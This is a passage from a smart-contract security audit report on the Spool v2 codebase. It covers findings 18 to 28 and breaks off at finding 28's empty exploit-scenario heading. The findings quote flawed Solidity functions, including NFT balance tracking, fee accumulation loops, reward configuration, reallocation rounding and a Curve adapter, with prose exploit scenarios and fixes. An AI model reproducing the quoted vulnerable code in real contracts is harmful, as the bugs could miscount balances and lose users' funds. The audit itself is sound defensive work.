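        if (_accessControl.hasRole(ROLE_STRATEGY, strategy)) {
            revert StrategyAlreadyRegistered({address_: strategy});
        }
        // A previously registered strategy still has _currentIndexes >= 1.
        if (_currentIndexes[strategy] != 0) {
            revert StrategyPreviouslyRegistered({address_: strategy});
        }

        _accessControl.grantRole(ROLE_STRATEGY, strategy);
        _currentIndexes[strategy] = 1;
        _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio();
        _stateAtDhw[address(strategy)][0].timestamp = uint32(block.timestamp);
    }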
18. Incorrect handling of partially burned NFTs results in incorrect SVT balance calculation

Severity: Low                         Difficulty: Medium
Type: Undefined Behavior              Finding ID: TOB-SPL-18
Target: manager/SmartVaultManager.sol, SmartVault.sol

Description
The SmartVault._afterTokenTransfer function removes the given NFT ID from the SmartVault._activeUserNFTIds array even if only a fraction of it is burned. As a result, the SmartVaultManager.getUserSVTBalance function, which uses SmartVault._activeUserNFTIds, will show less than the given user's actual balance.

SmartVault._afterTokenTransfer is executed after every token transfer (figure 18.1).

    function _afterTokenTransfer(
        address,
        address from,
        address to,
        uint256[] memory ids,
        uint256[] memory,
        bytes memory
    ) internal override {
        // burn
        if (to == address(0)) {
            uint256 count = _activeUserNFTCount[from];
            for (uint256 i; i < ids.length; ++i) {
                for (uint256 j = 0; j < count; j++) {
                    if (_activeUserNFTIds[from][j] == ids[i]) {
                        _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1];
                        count--;
                        break;
                    }
                }
            }
            _activeUserNFTCount[from] = count;
            return;
        }
        [...]
    }

Figure 18.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol

It removes the burned NFT from _activeUserNFTIds. However, it does not consider the amount of the NFT that was burned. As a result, NFTs that are not completely burned will not be considered active by the vault.

SmartVaultManager.getUserSVTBalance uses SmartVault._activeUserNFTIds to calculate a given user's SVT balance (figure 18.2).

    function getUserSVTBalance(address smartVaultAddress, address userAddress) external view returns (uint256) {
        if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) {
            (, uint256 ownerSVTs,, uint256 fees) = _simulateSync(smartVaultAddress);
            return ownerSVTs + fees;
        }

        uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress);
        uint256[] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress);

        if (nftIds.length > 0) {
            currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds);
        }

        return currentBalance;
    }

Figure 18.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol

Because partially burned NFTs are no longer present in SmartVault._activeUserNFTIds, the calculated balance will be less than the user's actual balance. The front end using getUserSVTBalance will show incorrect balances to users.

Exploit Scenario
Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited to the protocols after doHardWork is called. Alice claims SVTs by burning a fraction of her D-NFT. The smart vault removes the D-NFT from _activeUserNFTIds. Alice checks her SVT balance and panics when she sees less than what she expected. She withdraws all of her assets from the system.

Recommendations
Short term, add a check to the _afterTokenTransfer function so that it checks the balance of the NFT that is burned and removes the NFT from _activeUserNFTIds only when the NFT is burned completely.

Long term, improve the system's unit and integration tests to extensively test view functions.

19. Transfers of D-NFTs result in double counting of SVT balance

Severity: Medium                      Difficulty: Low
Type: Data Validation                 Finding ID: TOB-SPL-19
Target: manager/SmartVaultManager.sol, SmartVault.sol

Description
The _activeUserNFTIds and _activeUserNFTCount variables are not updated for the sender account on the transfer of NFTs. As a result, SVTs for transferred NFTs will be counted twice, causing the system to show an incorrect SVT balance.

The _afterTokenTransfer hook in the SmartVault contract is executed after every token transfer to update information about users' active NFTs:

    function _afterTokenTransfer(
        address,
        address from,
        address to,
        uint256[] memory ids,
        uint256[] memory,
        bytes memory
    ) internal override {
        // burn
        if (to == address(0)) {
            ...
            return;
        }

        // mint or transfer
        for (uint256 i; i < ids.length; ++i) {
            _activeUserNFTIds[to][_activeUserNFTCount[to]] = ids[i];
            _activeUserNFTCount[to]++;
        }
    }

Figure 19.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol

When a user transfers an NFT to another user, the function adds the NFT ID to the active NFT IDs of the receiver's account but does not remove the ID from the active NFT IDs of the sender's account. Additionally, the active NFT count is not updated for the sender's account.

The getUserSVTBalance function of the SmartVaultManager contract uses the SmartVault contract's _activeUserNFTIds array to calculate a given user's SVT balance:

    function getUserSVTBalance(address smartVaultAddress, address userAddress) external view returns (uint256) {
        if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) {
            (, uint256 ownerSVTs,, uint256 fees) = _simulateSync(smartVaultAddress);
            return ownerSVTs + fees;
        }

        uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress);
        uint256[] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress);

        if (nftIds.length > 0) {
            currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds);
        }

        return currentBalance;
    }

Figure 19.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol

Because transferred NFT IDs remain active for both senders and receivers, the SVTs corresponding to the NFT IDs will be counted for both users. This double counting will keep increasing the SVT balance for users with every transfer, causing an incorrect balance to be shown to users and third-party integrators.

Exploit Scenario
Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited into the protocols after doHardWork is called. Alice transfers the D-NFT to herself. The SmartVault contract adds the D-NFT ID to _activeUserNFTIds for Alice again. Alice checks her SVT balance and sees double the balance she had before.

Recommendations
Short term, modify the _afterTokenTransfer function so that it removes NFT IDs from the active NFT IDs for the sender's account when users transfer D-NFTs and W-NFTs.

Long term, add unit test cases for all possible user interactions to catch issues such as this.
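A minimal sketch (ours; the helper is an assumed addition mirroring the burn branch in figure 18.1) of the missing sender-side bookkeeping:

    // Sketch (not from the codebase): on a transfer (from != address(0) and
    // to != address(0)), drop each transferred ID from the sender's active
    // list before crediting the receiver.
    function _removeActiveNFT(address from, uint256 id) private {
        uint256 count = _activeUserNFTCount[from];
        for (uint256 j; j < count; ++j) {
            if (_activeUserNFTIds[from][j] == id) {
                _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1];
                _activeUserNFTCount[from] = count - 1;
                break;
            }
        }
    }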
20. Flawed loop for syncing flushes results in higher management fees

Severity: Medium                      Difficulty: Low
Type: Data Validation                 Finding ID: TOB-SPL-20
Target: manager/SmartVaultManager.sol, manager/DepositManager.sol

Description
The loop used to sync flush indexes in the SmartVaultManager contract computes an inflated value of the oldTotalSVTs variable, which results in higher management fees paid to the smart vault owner.

The _syncSmartVault function in the SmartVaultManager contract implements a loop to process every flush index from flushIndex.toSync to flushIndex.current:

    while (flushIndex.toSync < flushIndex.current) {
        ...
        DepositSyncResult memory syncResult = _depositManager.syncDeposits(
            smartVault,
            [flushIndex.toSync, bag.lastDhwSynced, bag.oldTotalSVTs],
            strategies_,
            [indexes, _getPreviousDhwIndexes(smartVault, flushIndex.toSync)],
            tokens,
            bag.fees
        );

        bag.newSVTs += syncResult.mintedSVTs;
        bag.feeSVTs += syncResult.feeSVTs;
        bag.oldTotalSVTs += bag.newSVTs;
        bag.lastDhwSynced = syncResult.dhwTimestamp;

        emit SmartVaultSynced(smartVault, flushIndex.toSync);

        flushIndex.toSync++;
    }

Figure 20.1: A snippet of the _syncSmartVault function in spool-v2-core/SmartVaultManager.sol

This loop adds the value of mintedSVTs to the newSVTs variable and then computes the value of oldTotalSVTs by adding newSVTs to it in every iteration. Because newSVTs accumulates across iterations, the SVTs minted for earlier flush indexes are added to oldTotalSVTs multiple times when the loop is iterated more than once. The value of oldTotalSVTs is then passed to the syncDeposits function of the DepositManager contract, which uses it to compute the management fee for the smart vault. The use of the inflated value of oldTotalSVTs causes higher management fees to be paid to the smart vault owner.

Exploit Scenario
Alice deposits assets into a smart vault and flushes it. Before doHardWork is executed, Bob deposits assets into the same smart vault and flushes it. At this point, flushIndex.current has been increased twice for the smart vault. After the execution of doHardWork, the loop to sync the smart vault is iterated twice. As a result, a double management fee is paid to the smart vault owner, and Alice and Bob lose assets.

Recommendations
Short term, modify the loop so that syncResult.mintedSVTs is added to bag.oldTotalSVTs instead of bag.newSVTs.

Long term, be careful when implementing accumulators in loops. Add test cases for multiple interactions to catch such issues.

21. Incorrect ghost strategy check

Severity: Informational               Difficulty: Medium
Type: Data Validation                 Finding ID: TOB-SPL-21
Target: manager/StrategyRegistry.sol

Description
The emergencyWithdraw and redeemStrategyShares functions incorrectly check whether a strategy is a ghost strategy after checking that the strategy has the ROLE_STRATEGY role.

    function emergencyWithdraw(
        address[] calldata strategies,
        uint256[][] calldata withdrawalSlippages,
        bool removeStrategies
    ) external onlyRole(ROLE_EMERGENCY_WITHDRAWAL_EXECUTOR, msg.sender) {
        for (uint256 i; i < strategies.length; ++i) {
            _checkRole(ROLE_STRATEGY, strategies[i]);
            if (strategies[i] == _ghostStrategy) {
                continue;
            }
            [...]

Figure 21.1: A snippet of the emergencyWithdraw function in spool-v2-core/StrategyRegistry.sol#L456–L465

    function redeemStrategyShares(
        address[] calldata strategies,
        uint256[] calldata shares,
        uint256[][] calldata withdrawalSlippages
    ) external {
        for (uint256 i; i < strategies.length; ++i) {
            _checkRole(ROLE_STRATEGY, strategies[i]);
            if (strategies[i] == _ghostStrategy) {
                continue;
            }
            [...]

Figure 21.2: A snippet of the redeemStrategyShares function in spool-v2-core/StrategyRegistry.sol#L477–L486

A ghost strategy will never have the ROLE_STRATEGY role, so both functions will always incorrectly revert if a ghost strategy is passed in the strategies array.

Exploit Scenario
Bob calls redeemStrategyShares with the ghost strategy in strategies, and the transaction unexpectedly reverts.

Recommendations
Short term, modify the affected functions so that they verify whether the given strategy is a ghost strategy before checking the role with _checkRole.
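A sketch of the reordered checks (ours; it applies to both functions shown in figures 21.1 and 21.2):

    // Sketch (not from the codebase): skip ghost strategies before enforcing
    // ROLE_STRATEGY, so passing the ghost strategy no longer reverts.
    for (uint256 i; i < strategies.length; ++i) {
        if (strategies[i] == _ghostStrategy) {
            continue;
        }
        _checkRole(ROLE_STRATEGY, strategies[i]);
        [...]
    }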
Long term, clearly document which roles a contract should have and implement the appropriate checks to verify them.

22. Reward configuration not initialized properly when reward is zero

Severity: Low                         Difficulty: Low
Type: Undefined Behavior              Finding ID: TOB-SPL-22
Target: rewards/RewardManager.sol

Description
The RewardManager.addToken function, which adds a new reward token for the given smart vault, does not initialize all configuration variables when the initial reward is zero. As a result, all calls to the RewardManager.extendRewardEmission function will fail, and rewards cannot be added for that vault.

RewardManager.addToken adds a new reward token for the given smart vault. The reward tokens for a smart vault are tracked in the RewardManager.rewardConfiguration mapping. The tokenAdded value of the configuration is used to check whether the token has already been added for the vault (figure 22.1).

    function addToken(
        address smartVault,
        IERC20 token,
        uint32 rewardsDuration,
        uint256 reward
    ) external onlyAdminOrVaultAdmin(smartVault, msg.sender) exceptUnderlying(smartVault, token) {
        RewardConfiguration storage config = rewardConfiguration[smartVault][token];

        if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token));
        if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token));
        if (rewardsDuration == 0) revert InvalidRewardDuration();
        if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached();

        rewardTokens[smartVault][rewardTokensCount[smartVault]] = token;
        rewardTokensCount[smartVault]++;

        config.rewardsDuration = rewardsDuration;

        if (reward > 0) {
            _extendRewardEmission(smartVault, token, reward);
        }
    }

Figure 22.1: The addToken function in spool-v2-core/RewardManager.sol#L81–L101

However, RewardManager.addToken does not update config.tokenAdded, and the _extendRewardEmission function, which updates config.tokenAdded, is called only when the reward is greater than zero.

RewardManager.extendRewardEmission is the only entry point to add rewards for a vault. It checks whether the token has been previously added by verifying that tokenAdded is greater than zero (figure 22.2).

    function extendRewardEmission(
        address smartVault,
        IERC20 token,
        uint256 reward,
        uint32 rewardsDuration
    ) external onlyAdminOrVaultAdmin(smartVault, msg.sender) exceptUnderlying(smartVault, token) {
        if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token));
        if (rewardsDuration == 0) revert InvalidRewardDuration();

        if (rewardConfiguration[smartVault][token].tokenAdded == 0) {
            revert InvalidRewardToken(address(token));
        }
        [...]
    }

Figure 22.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol#L106–L119

Because tokenAdded is not initialized when the initial rewards are zero, the vault admin cannot add rewards for the vault in that token. The impact of this issue is lower because the vault admin can use the RewardManager.removeReward function to remove the token and add it again with a nonzero initial reward. Note that the vault admin can only remove the token without blacklisting it because the config.periodFinish value is also not initialized when the initial reward is zero.

Exploit Scenario
Alice is the admin of a smart vault. She adds a reward token for her smart vault with the initial reward set to zero. Alice tries to add rewards using extendRewardEmission, and the transaction fails. She cannot add rewards for her smart vault.
She has to remove the token and re-add it with a nonzero initial reward.

Recommendations
Short term, use a separate Boolean variable to track whether a token has been added for a smart vault, and have RewardManager.addToken initialize that variable.

Long term, improve the system's unit tests to cover all execution paths.

23. Missing function for removing reward tokens from the blacklist

Severity: Informational               Difficulty: High
Type: Undefined Behavior              Finding ID: TOB-SPL-23
Target: rewards/RewardManager.sol

Description
A Spool admin can blacklist a reward token for a smart vault through the RewardManager contract, but they cannot remove it from the blacklist. As a result, a reward token cannot be used again once it is blacklisted.

The RewardManager.forceRemoveReward function blacklists the given reward token by updating the RewardManager.tokenBlacklist mapping (figure 23.1). Blacklisted tokens cannot be used as rewards.

    function forceRemoveReward(address smartVault, IERC20 token) external onlyRole(ROLE_SPOOL_ADMIN, msg.sender) {
        tokenBlacklist[smartVault][token] = true;

        _removeReward(smartVault, token);

        delete rewardConfiguration[smartVault][token];
    }

Figure 23.1: The forceRemoveReward function in spool-v2-core/RewardManager.sol#L160–L165

However, RewardManager does not have a function to remove tokens from the blacklist. As a result, if the Spool admin accidentally blacklists a token, then the smart vault admin will never be able to use that token to send rewards.

Exploit Scenario
Alice is the admin of a smart vault. She adds WETH and token A as rewards. The value of token A declines rapidly, so a Spool admin decides to blacklist the token for Alice's vault. The Spool admin accidentally supplies the WETH address in the call to forceRemoveReward. As a result, WETH is blacklisted, and Alice cannot send rewards in WETH.

Recommendations
Short term, add a function with the proper access controls to remove tokens from the blacklist.

Long term, improve the system's unit tests to cover all execution paths.
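A minimal sketch (ours; the function name is an assumption) of such a counterpart to forceRemoveReward:

    // Sketch (not from the codebase): a Spool-admin-only function to undo an
    // accidental blacklisting.
    function removeFromBlacklist(address smartVault, IERC20 token)
        external
        onlyRole(ROLE_SPOOL_ADMIN, msg.sender)
    {
        tokenBlacklist[smartVault][token] = false;
    }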
24. Risk of unclaimed shares due to loss of precision in reallocation operations

Severity: Informational               Difficulty: Low
Type: Undefined Behavior              Finding ID: TOB-SPL-24
Target: libraries/ReallocationLib.sol

Description
The ReallocationLib.calculateReallocation function releases strategy shares and calculates their USD value. The USD value is later converted into strategy shares in the ReallocationLib.doReallocation function. Because the conversion operations always round down, the number of shares calculated in doReallocation will be less than the shares released in calculateReallocation. As a result, some shares released in calculateReallocation will be unclaimed, as ReallocationLib distributes only the shares computed in doReallocation.

ReallocationLib.calculateReallocation calculates the USD value that needs to be withdrawn from each of the strategies used by smart vaults (figure 24.1). The smart vaults release the shares equivalent to the calculated USD value.

    /**
     * @dev Calculates reallocation needed per smart vault.
     [...]
     * @return Reallocation of the smart vault:
     * - first index is 0 or 1
     * - 0:
     *   - second index runs over smart vault's strategies
     *   - value is USD value that needs to be withdrawn from the strategy
     [...]
     */
    function calculateReallocation([...]) private returns (uint256[][] memory) {
        [...]
        } else if (targetValue < currentValue) {
            // This strategy needs withdrawal.
            [...]
            IStrategy(smartVaultStrategies[i]).releaseShares(smartVault, sharesToRedeem);

            // Recalculate value to withdraw based on released shares.
            reallocation[0][i] = IStrategy(smartVaultStrategies[i]).totalUsdValue() * sharesToRedeem
                / IStrategy(smartVaultStrategies[i]).totalSupply();
        }
    }

    return reallocation;
}

Figure 24.1: The calculateReallocation function in spool-v2-core/ReallocationLib.sol#L161–L207

The ReallocationLib.buildReallocationTable function calculates the reallocationTable value. The reallocationTable[i][j][0] value represents the USD amount that should move from strategy i to strategy j (figure 24.2). These USD amounts are calculated using the USD values of the released shares computed in ReallocationLib.calculateReallocation (represented by reallocation[0][i] in figure 24.1).

    /**
     [...]
     * @return Reallocation table:
     * - first index runs over all strategies i
     * - second index runs over all strategies j
     * - third index is 0, 1 or 2
     * - 0: value represents USD value that should be withdrawn by strategy i and deposited into strategy j
     */
    function buildReallocationTable([...]) private pure returns (uint256[][][] memory) {

Figure 24.2: A snippet of the buildReallocationTable function in spool-v2-core/ReallocationLib.sol#L209–L228

ReallocationLib.doReallocation calculates the total USD amount that should be withdrawn from a strategy (figure 24.3). This total USD amount is exactly equal to the sum of the USD values needed to be withdrawn from the strategy for each of the smart vaults. The doReallocation function converts the total USD value to the equivalent number of strategy shares. The ReallocationLib library withdraws this exact number of shares from the strategy and distributes them to other strategies that require deposits of these shares.

    function doReallocation(
        [...]
        uint256[][][] memory reallocationTable
    ) private {
        // Distribute matched shares and withdraw unmatched ones.
        for (uint256 i; i < strategies.length; ++i) {
            [...]
            {
                uint256[2] memory totals;
                // totals[0] -> total withdrawals
                for (uint256 j; j < strategies.length; ++j) {
                    totals[0] += reallocationTable[i][j][0];
                    [...]
                }

                // Calculate amount of shares to redeem and to distribute.
                uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn
                    IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).totalUsdValue();
                [...]
            }
            [...]

Figure 24.3: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L350

Theoretically, the shares calculated for a strategy should be equal to the shares released by all of the smart vaults for that strategy. However, there is a loss of precision in both the calculateReallocation function's calculation of the USD value of released shares and the doReallocation function's conversion of the combined USD value to strategy shares. As a result, the number of shares calculated in doReallocation will be less than the shares released by all of the smart vaults in calculateReallocation. Because the ReallocationLib library distributes only these calculated shares, some strategy shares will be left unclaimed as dust.

It is important to note that the rounding error could be greater than one in the context of multiple smart vaults. Additionally, the error could be even greater if the conversion results were rounded in the opposite direction: in that case, if the calculated shares were greater than the released shares, the reallocation would fail when burn and claim operations are executed.
Recommendations
Short term, modify the code so that it stores the number of shares released in calculateReallocation, and implement dustless calculations to build the reallocationTable value with the share amounts and the USD amounts. Have doReallocation use this reallocationTable value to calculate the value of sharesToDistribute.

Long term, use Echidna to test system and mathematical invariants.

25. Curve3CoinPoolAdapter's _addLiquidity reverts due to incorrect amounts deposited

Severity: Medium                      Difficulty: Low
Type: Undefined Behavior              Finding ID: TOB-SPL-25
Target: strategies/curve/CurveAdapter.sol

Description
The _addLiquidity function loops through the amounts array, but that array contains an additional element that the Strategy.doHardWork function uses to keep track of whether deposits need to be made. As a result, _addLiquidity overwrites the number of tokens to send for the first asset, causing far fewer tokens to be deposited than expected and the transaction to revert due to the slippage check.

    function _addLiquidity(uint256[] memory amounts, uint256 slippage) internal {
        uint256[N_COINS] memory curveAmounts;

        for (uint256 i; i < amounts.length; ++i) {
            curveAmounts[assetMapping().get(i)] = amounts[i];
        }

        ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage);
    }

Figure 25.1: The _addLiquidity function in spool-v2-core/CurveAdapter.sol#L12–L20

The last element in the doHardWork function's assetsToDeposit array keeps track of the deposits to be made and is incremented by one on each iteration of assets in assetGroup if that asset has tokens to deposit. This array is then passed to the _depositToProtocol function and, for strategies that use the Curve3CoinPoolAdapter, is passed to _addLiquidity in the amounts parameter. When _addLiquidity iterates over the last element in the amounts array, the assetMapping().get(i) function will return 0 because index i is uninitialized in assetMapping. This return value will overwrite the number of tokens to deposit for the first asset with a strictly smaller amount.

    function doHardWork(StrategyDhwParameterBag calldata dhwParams) external returns (DhwInfo memory dhwInfo) {
        _checkRole(ROLE_STRATEGY_REGISTRY, msg.sender);

        // assetsToDeposit[0..token.length-1]: amount of asset i to deposit
        // assetsToDeposit[token.length]: is there anything to deposit
        uint256[] memory assetsToDeposit = new uint256[](dhwParams.assetGroup.length + 1);
        unchecked {
            for (uint256 i; i < dhwParams.assetGroup.length; ++i) {
                assetsToDeposit[i] = IERC20(dhwParams.assetGroup[i]).balanceOf(address(this));

                if (assetsToDeposit[i] > 0) {
                    ++assetsToDeposit[dhwParams.assetGroup.length];
                }
            }
        }
        [...]
        // - deposit assets into the protocol
        _depositToProtocol(dhwParams.assetGroup, assetsToDeposit, dhwParams.slippages);

Figure 25.2: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L71–L75

Exploit Scenario
The doHardWork function is called for a smart vault that uses the ConvexAlusdStrategy strategy; however, the subsequent call to _addLiquidity reverts due to the incorrect number of assets that it is trying to deposit. The smart vault is unusable.

Recommendations
Short term, have _addLiquidity iterate over the amounts array N_COINS times instead of over its full length.

Long term, refactor the Strategy.doHardWork function so that it does not use an additional element in the assetsToDeposit array to keep track of whether deposits need to be made. Instead, use a separate Boolean variable. The current pattern is too error-prone.
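A sketch (ours) of the short-term fix, a one-line change to the loop bound from figure 25.1:

    // Sketch (not from the codebase): iterate over the N_COINS real assets
    // only, ignoring the extra flag element appended by Strategy.doHardWork.
    function _addLiquidity(uint256[] memory amounts, uint256 slippage) internal {
        uint256[N_COINS] memory curveAmounts;

        for (uint256 i; i < N_COINS; ++i) {
            curveAmounts[assetMapping().get(i)] = amounts[i];
        }

        ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage);
    }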
26. Reallocation process reverts when a ghost strategy is present

Severity: High                        Difficulty: High
Type: Data Validation                 Finding ID: TOB-SPL-26
Target: libraries/ReallocationLib.sol

Description
The reallocation process reverts in multiple places when a ghost strategy is present. As a result, it is impossible to reallocate a smart vault with a ghost strategy.

The first revert would occur in the mapStrategies function (figure 26.1). Users calling the reallocate function would not know to add the ghost strategy address to the strategies array, which holds the strategies that need to be reallocated. This function reverts if it does not find a strategy in the array. Even if the ghost strategy address is in strategies, a revert would occur in the areas described below.

    function mapStrategies(
        address[] calldata smartVaults,
        address[] calldata strategies,
        mapping(address => address[]) storage _smartVaultStrategies
    ) private view returns (uint256[][] memory) {
        [...]
        // Loop over smart vault's strategies.
        for (uint256 j; j < smartVaultStrategiesLength; ++j) {
            address strategy = smartVaultStrategies[j];
            bool found = false;

            // Try to find the strategy in the provided list of strategies.
            for (uint256 k; k < strategies.length; ++k) {
                if (strategies[k] == strategy) {
                    // Match found.
                    found = true;
                    strategyMatched[k] = true;
                    // Add entry to the strategy mapping.
                    strategyMapping[i][j] = k;

                    break;
                }
            }

            if (!found) {
                // If a smart vault's strategy was not found in the provided
                // list of strategies, this means that the provided list is invalid.
                revert InvalidStrategies();
            }
        }
    }

Figure 26.1: A snippet of the mapStrategies function in spool-v2-core/ReallocationLib.sol#L86–L144

During the reallocation process, the doReallocation function calls the beforeRedeemalCheck and beforeDepositCheck functions even on ghost strategies (figure 26.2); however, the ghost strategy implementations of these functions revert with an IsGhostStrategy error (figure 26.3).

    function doReallocation(
        address[] calldata strategies,
        ReallocationParameterBag calldata reallocationParams,
        uint256[][][] memory reallocationTable
    ) private {
        if (totals[0] == 0) {
            IStrategy(strategies[i]).beforeRedeemalCheck(0, reallocationParams.withdrawalSlippages[i]);

            // There is nothing to withdraw from strategy i.
            continue;
        }

        // Calculate amount of shares to redeem and to distribute.
        uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn
            IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).totalUsdValue();

        IStrategy(strategies[i]).beforeRedeemalCheck(
            sharesToDistribute,
            reallocationParams.withdrawalSlippages[i]
        );
        [...]
        // Deposit assets into the underlying protocols.
        for (uint256 i; i < strategies.length; ++i) {
            IStrategy(strategies[i]).beforeDepositCheck(toDeposit[i], reallocationParams.depositSlippages[i]);
        [...]

Figure 26.2: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L469

    contract GhostStrategy is IERC20Upgradeable, IStrategy {
        [...]
        function beforeDepositCheck(uint256[] memory, uint256[] calldata) external pure {
            revert IsGhostStrategy();
        }

        function beforeRedeemalCheck(uint256, uint256[] calldata) external pure {
            revert IsGhostStrategy();
        }

Figure 26.3: The beforeDepositCheck and beforeRedeemalCheck functions in spool-v2-core/GhostStrategy.sol#L98–L104

Exploit Scenario
A strategy is removed from a smart vault.
Bob, who has the ROLE_ALLOCATOR role, calls reallocate, but the call reverts, and the smart vault is impossible to reallocate.

Recommendations
Short term, modify the associated code so that ghost strategies are not passed to the reallocate function in the _smartVaultStrategies parameter.

Long term, improve the system's unit and integration tests to test for smart vaults with ghost strategies. Such tests are currently missing.

27. Broken test cases that hide security issues

Severity: Informational               Difficulty: Undetermined
Type: Testing                         Finding ID: TOB-SPL-27
Target: test/RewardManager.t.sol, test/integration/RemoveStrategy.t.sol

Description
Multiple test cases do not check sufficient conditions to verify the correctness of the code, which could result in the deployment of buggy code in production and the loss of funds.

The test_extendRewardEmission_ok test does not check the new reward rate and duration to verify the effect of the call to the extendRewardEmission function on the RewardManager contract:

    function test_extendRewardEmission_ok() public {
        deal(address(rewardToken), vaultOwner, rewardAmount * 2, true);

        vm.startPrank(vaultOwner);
        rewardToken.approve(address(rewardManager), rewardAmount * 2);
        rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount);
        rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration);
        vm.stopPrank();
    }

Figure 27.1: An insufficient test case for extendRewardEmission in spool-v2-core/RewardManager.t.sol

The test_removeReward_ok test does not check the new reward token count and the deletion of the reward configuration for the smart vault to verify the effect of the call to the removeReward function on the RewardManager contract:

    function test_removeReward_ok() public {
        deal(address(rewardToken), vaultOwner, rewardAmount, true);

        vm.startPrank(vaultOwner);
        rewardToken.approve(address(rewardManager), rewardAmount);
        rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount);
        skip(rewardDuration + 1);
        rewardManager.removeReward(smartVault, rewardToken);
        vm.stopPrank();
    }

Figure 27.2: An insufficient test case for removeReward in spool-v2-core/RewardManager.t.sol

There is no test case to check the access controls of the removeReward function. Similarly, the test_forceRemoveReward_ok test does not check the effects of the forced removal of a reward token. Findings TOB-SPL-28 and TOB-SPL-29 were not detected because of these broken test cases.

The test_removeStrategy_betweenFlushAndDHW test does not check the balance of the master wallet. The test_removeStrategy_betweenFlushAndDhwWithdrawals test removes the strategy before the "do hard work" execution of the deposit cycle instead of removing it before the "do hard work" execution of the withdrawal cycle, making this test case redundant. Finding TOB-SPL-33 would have been detected if this test had been correctly implemented.

There may be other broken tests that we did not find, as we could not cover all of the test cases.

Exploit Scenario
The Spool team deploys the protocol. After some time, the Spool team makes changes to the code that introduce a bug that goes unnoticed due to the broken test cases. The team deploys the new changes with confidence in their tests and ends up introducing a security issue in the production deployment of the protocol.

Recommendations
Short term, fix the test cases described above.

Long term, review all of the system's test cases and make sure that they verify the given state change correctly and sufficiently after an interaction with the protocol. Use Necessist to find broken test cases and fix them.
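For instance, a strengthened version of the test in figure 27.1 could assert the observable effects of the call. The sketch below is ours; the shape of the rewardConfiguration getter is an assumption for illustration:

    // Sketch (assumed getter shape): assert the configuration fields that
    // extendRewardEmission is expected to update.
    function test_extendRewardEmission_updatesConfiguration() public {
        deal(address(rewardToken), vaultOwner, rewardAmount * 2, true);

        vm.startPrank(vaultOwner);
        rewardToken.approve(address(rewardManager), rewardAmount * 2);
        rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount);
        rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration);
        vm.stopPrank();

        // Assumed: the public rewardConfiguration mapping exposes these fields.
        (uint32 duration, uint32 periodFinish, uint192 rewardRate,,) =
            rewardManager.rewardConfiguration(smartVault, rewardToken);
        assertEq(duration, rewardDuration);
        assertEq(periodFinish, uint32(block.timestamp) + rewardDuration);
        assertGt(rewardRate, 0);
    }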
28. Reward emission can be extended for a removed reward token

Severity: Medium                      Difficulty: Medium
Type: Data Validation                 Finding ID: TOB-SPL-28
Target: rewards/RewardManager.sol

Description
Smart vault owners can extend the reward emission for a removed token, which may cause tokens to be stuck in the RewardManager contract.

The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration:

    function _removeReward(address smartVault, IERC20 token) private {
        uint256 _rewardTokensCount = rewardTokensCount[smartVault];
        for (uint256 i; i < _rewardTokensCount; ++i) {
            if (rewardTokens[smartVault][i] == token) {
                rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1];
                delete rewardTokens[smartVault][_rewardTokensCount - 1];
                rewardTokensCount[smartVault]--;

                emit RewardRemoved(smartVault, token);
                break;
            }
        }
    }

Figure 28.1: The _removeReward function in spool-v2-core/RewardManager.sol

The extendRewardEmission function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is not zero to make sure that the token was already added to the smart vault:

    function extendRewardEmission(address smartVault, IERC20 token, uint256 reward, uint32 rewardsDuration)
        external
        onlyAdminOrVaultAdmin(smartVault, msg.sender)
        exceptUnderlying(smartVault, token)
    {
        if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token));
        if (rewardsDuration == 0) revert InvalidRewardDuration();

        if (rewardConfiguration[smartVault][token].tokenAdded == 0) {
            revert InvalidRewardToken(address(token));
        }

        rewardConfiguration[smartVault][token].rewardsDuration = rewardsDuration;

        _extendRewardEmission(smartVault, token, reward);
    }

Figure 28.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol

After a reward token is removed from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which allows the smart vault owner to extend the reward emission for the removed token.

Exploit Scenario
